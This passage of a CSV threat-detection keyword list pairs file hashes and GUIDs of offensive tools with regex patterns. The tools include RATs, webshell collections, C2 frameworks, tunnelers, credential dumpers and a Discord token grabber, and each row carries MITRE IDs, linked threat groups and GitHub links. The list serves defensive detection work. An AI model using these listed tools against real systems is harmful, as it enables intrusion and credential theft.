#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","41859" "*e1ed880a56c4cbe995035969850bb409996edba8e31c05d654f525112026633f*",".{0,1000}e1ed880a56c4cbe995035969850bb409996edba8e31c05d654f525112026633f.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","41860" "*e1eeb3735ada6088c8b1a740671d4430b26249f1f9b09b5052a00d398c832815*",".{0,1000}e1eeb3735ada6088c8b1a740671d4430b26249f1f9b09b5052a00d398c832815.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","41861" "*e1f73610acb162bda5e6e46fdfbcb52c9259558566a659d979b8f794acc624a5*",".{0,1000}e1f73610acb162bda5e6e46fdfbcb52c9259558566a659d979b8f794acc624a5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","41864" 
"*e1f8df267cad6116eb09bcb7047cae858b291630d86d9b5eb0879cb22cabc66c*",".{0,1000}e1f8df267cad6116eb09bcb7047cae858b291630d86d9b5eb0879cb22cabc66c.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","41865" "*e200d8dc85bb86dbaea7479accc22dbb5a80776d45a5f7d156816db9faffdfb3*",".{0,1000}e200d8dc85bb86dbaea7479accc22dbb5a80776d45a5f7d156816db9faffdfb3.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","41869" "*e209287748c60d712f78c33501841c2148db4cddc98ec6c543262c203300bfd9*",".{0,1000}e209287748c60d712f78c33501841c2148db4cddc98ec6c543262c203300bfd9.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41871" "*e21059349b25d8158d9000d34dc6b296e4a680c7b613ad8455bae2df118d7dcc*",".{0,1000}e21059349b25d8158d9000d34dc6b296e4a680c7b613ad8455bae2df118d7dcc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41875" "*E211C5CD-85F0-48D2-A18F-2E59AD47DDC3*",".{0,1000}E211C5CD\-85F0\-48D2\-A18F\-2E59AD47DDC3.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","41876" "*e213ddff412e4aaa9a0cd6460b14cc246a5b33e60f76440482e0142b8a239ff9*",".{0,1000}e213ddff412e4aaa9a0cd6460b14cc246a5b33e60f76440482e0142b8a239ff9.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - 
Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","41878" "*e21abc2c59ac704df355a42b7275021e48670c876d019f05f56bf5a9c4cff78c*",".{0,1000}e21abc2c59ac704df355a42b7275021e48670c876d019f05f56bf5a9c4cff78c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41879" "*e21f177a1cf17b0f3b336054e36ae97bdad19d7204b23944fcea7d81c3272c3b*",".{0,1000}e21f177a1cf17b0f3b336054e36ae97bdad19d7204b23944fcea7d81c3272c3b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41880" "*e21f6e3c1907732a3654077febd8b675cab97d2ef3529e8dcfa6ce16ffd80967*",".{0,1000}e21f6e3c1907732a3654077febd8b675cab97d2ef3529e8dcfa6ce16ffd80967.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation 
Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","41881" "*e21f6e3c1907732a3654077febd8b675cab97d2ef3529e8dcfa6ce16ffd80967*",".{0,1000}e21f6e3c1907732a3654077febd8b675cab97d2ef3529e8dcfa6ce16ffd80967.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","41882" "*e22080246ffecef9d922c07fe2511b93f8b7d585b6a2c9b2d6332a93b2e5cf87*",".{0,1000}e22080246ffecef9d922c07fe2511b93f8b7d585b6a2c9b2d6332a93b2e5cf87.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","41883" "*e224ba9728a4a03d2f06da625241c25b61b2b15b5124c1384eeee8dcba2ce208*",".{0,1000}e224ba9728a4a03d2f06da625241c25b61b2b15b5124c1384eeee8dcba2ce208.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41885" "*e22a97f69dbd69e72d2bd9b542a44c33a2139963ca121976085de6bc23858ce9*",".{0,1000}e22a97f69dbd69e72d2bd9b542a44c33a2139963ca121976085de6bc23858ce9.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","41886" "*e230c0ac37691456fdf0363b1f81215c15a7a235ddc96f072c74c5ac40866c9e*",".{0,1000}e230c0ac37691456fdf0363b1f81215c15a7a235ddc96f072c74c5ac40866c9e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41887" "*e237f1a9a8fc58940811f2ea1eb987242718290c588fb36c29741176700980bb*",".{0,1000}e237f1a9a8fc58940811f2ea1eb987242718290c588fb36c29741176700980bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","41888" "*e23efc384f4295bb8fbf5b0e6f2f3539f6ff45fbc2ef8ce2bb54aefebaa069e3*",".{0,1000}e23efc384f4295bb8fbf5b0e6f2f3539f6ff45fbc2ef8ce2bb54aefebaa069e3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","41889" "*e241be711b4e535d9275bd5878d45e4c89bf4e269d27f1742aa9b2410d68ebf2*",".{0,1000}e241be711b4e535d9275bd5878d45e4c89bf4e269d27f1742aa9b2410d68ebf2.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - 
TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","41890" "*e24dd6d8fb7ae3f556d3a64acf5627d210e92f4ca2e9473278b7273d21a696b3*",".{0,1000}e24dd6d8fb7ae3f556d3a64acf5627d210e92f4ca2e9473278b7273d21a696b3.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","41894" "*e258ac6068d1de41188caf6269d662aadf7b6e0489aa7b18b32a57f4691559e3*",".{0,1000}e258ac6068d1de41188caf6269d662aadf7b6e0489aa7b18b32a57f4691559e3.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","41895" "*E2596512-8A36-4D48-8AA1-9791E48A16CC*",".{0,1000}E2596512\-8A36\-4D48\-8AA1\-9791E48A16CC.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41896" "*e26ad15ce8889faf79eecbb5b8395b28df02ea622996199e7e4384635b55b14f*",".{0,1000}e26ad15ce8889faf79eecbb5b8395b28df02ea622996199e7e4384635b55b14f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - 
T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","41898" "*e273485e4f1382b7848b6c263cf0ce9e37aa783e9e781630aaa50daffea5aeb2*",".{0,1000}e273485e4f1382b7848b6c263cf0ce9e37aa783e9e781630aaa50daffea5aeb2.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","41899" "*e273cf78ec19c5e3051a98721131c2b94d7a3bdadc5e3269ccb7b72e230ee643*",".{0,1000}e273cf78ec19c5e3051a98721131c2b94d7a3bdadc5e3269ccb7b72e230ee643.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","41900" "*e277468009b97989146089c83231fa03247555b6cc2979b68d549a0d0e8ea0e1*",".{0,1000}e277468009b97989146089c83231fa03247555b6cc2979b68d549a0d0e8ea0e1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions.
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","41902" "*E2778331DA361353B5A445FBD4488418BD25F19FBB931AB39FD9E005137153E8*",".{0,1000}E2778331DA361353B5A445FBD4488418BD25F19FBB931AB39FD9E005137153E8.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","41903" "*e279a6912143a62d5f1a036f60a97e3c8db8609bbaf4aa56d5a85c9adf3571ca*",".{0,1000}e279a6912143a62d5f1a036f60a97e3c8db8609bbaf4aa56d5a85c9adf3571ca.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash 
#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","41904" "*e279bdfd5c0a7c8782255f9c144d85635054f9b26db4909669d80ff1cd853893*",".{0,1000}e279bdfd5c0a7c8782255f9c144d85635054f9b26db4909669d80ff1cd853893.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41905" "*e27bbd5323fd6e3c1fcd501bf9279dd83fa211892c10ebf552773f4f5c89e4ab*",".{0,1000}e27bbd5323fd6e3c1fcd501bf9279dd83fa211892c10ebf552773f4f5c89e4ab.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","#filehash","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","41907" "*e27f5050d889525c51431074c81403d6917f081af8694a978e92a975a5b67472*",".{0,1000}e27f5050d889525c51431074c81403d6917f081af8694a978e92a975a5b67472.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41908" 
"*e281c4aeeb508f9ec7abdaedde54203747ef31b02b97aa21ea7a2c4c06659f11*",".{0,1000}e281c4aeeb508f9ec7abdaedde54203747ef31b02b97aa21ea7a2c4c06659f11.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41910" "*e290d98bd79a5f643d384efdf56a7c6c383c12efd3c810bf4513dda266cd7935*",".{0,1000}e290d98bd79a5f643d384efdf56a7c6c383c12efd3c810bf4513dda266cd7935.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included.
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","41911" "*e292dfd2c82421324fdc94d544472f78528bdd862148509cab29ecdcbf9d8c4c*",".{0,1000}e292dfd2c82421324fdc94d544472f78528bdd862148509cab29ecdcbf9d8c4c.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41912" "*e2940f2785f9f9b38e5cac80100a401145f558602a7af45475760884aeba44f9*",".{0,1000}e2940f2785f9f9b38e5cac80100a401145f558602a7af45475760884aeba44f9.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","41913" "*e294df6f9ef18160367aa9d540ca2c26dc1c17211289c7154d347308e0902af5*",".{0,1000}e294df6f9ef18160367aa9d540ca2c26dc1c17211289c7154d347308e0902af5.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","41914" "*e2964ea4bc4e439e55f46ed309904e9592145858076d65363a2bbbab0bd608cc*",".{0,1000}e2964ea4bc4e439e55f46ed309904e9592145858076d65363a2bbbab0bd608cc.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output 
or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","41915" "*e2a00647b5fa56b077d3d07b1c05e3b76b7269e07fc3ea84750eb03ad71024de*",".{0,1000}e2a00647b5fa56b077d3d07b1c05e3b76b7269e07fc3ea84750eb03ad71024de.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41917" "*e2a30fed2c42d6b7e9098b8d7dda2cecab3c404b4aaff289d58dea32003c31e6*",".{0,1000}e2a30fed2c42d6b7e9098b8d7dda2cecab3c404b4aaff289d58dea32003c31e6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","41918" "*e2bff960e45f419ca14338dcdefdcfe25378bc5efa56adfb762ebca92847d86f*",".{0,1000}e2bff960e45f419ca14338dcdefdcfe25378bc5efa56adfb762ebca92847d86f.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","41922" 
"*e2c267e1e289e975e1a4a2acf13f30eb04dbb4a4da24daae02c248dbb199e919*",".{0,1000}e2c267e1e289e975e1a4a2acf13f30eb04dbb4a4da24daae02c248dbb199e919.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","41923" "*e2c3b2d10ba4db5f13e05de8197818f8ce94da878b5eba6c82a7feb73340b538*",".{0,1000}e2c3b2d10ba4db5f13e05de8197818f8ce94da878b5eba6c82a7feb73340b538.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","41924" "*e2c4f99f6a5d7bd663caba698a5867963fa2917201dcad6e94de8ff4a3f6a256*",".{0,1000}e2c4f99f6a5d7bd663caba698a5867963fa2917201dcad6e94de8ff4a3f6a256.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41925" "*e2dce90e4211ea7dcd8e5721b9b9131484cf6974bb5d5a9c91e39c05710733df*",".{0,1000}e2dce90e4211ea7dcd8e5721b9b9131484cf6974bb5d5a9c91e39c05710733df.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41928" "*e2e2086796947124cf0dded1338a6c1d86da44ed72a7bb49248fd65e491d88c9*",".{0,1000}e2e2086796947124cf0dded1338a6c1d86da44ed72a7bb49248fd65e491d88c9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 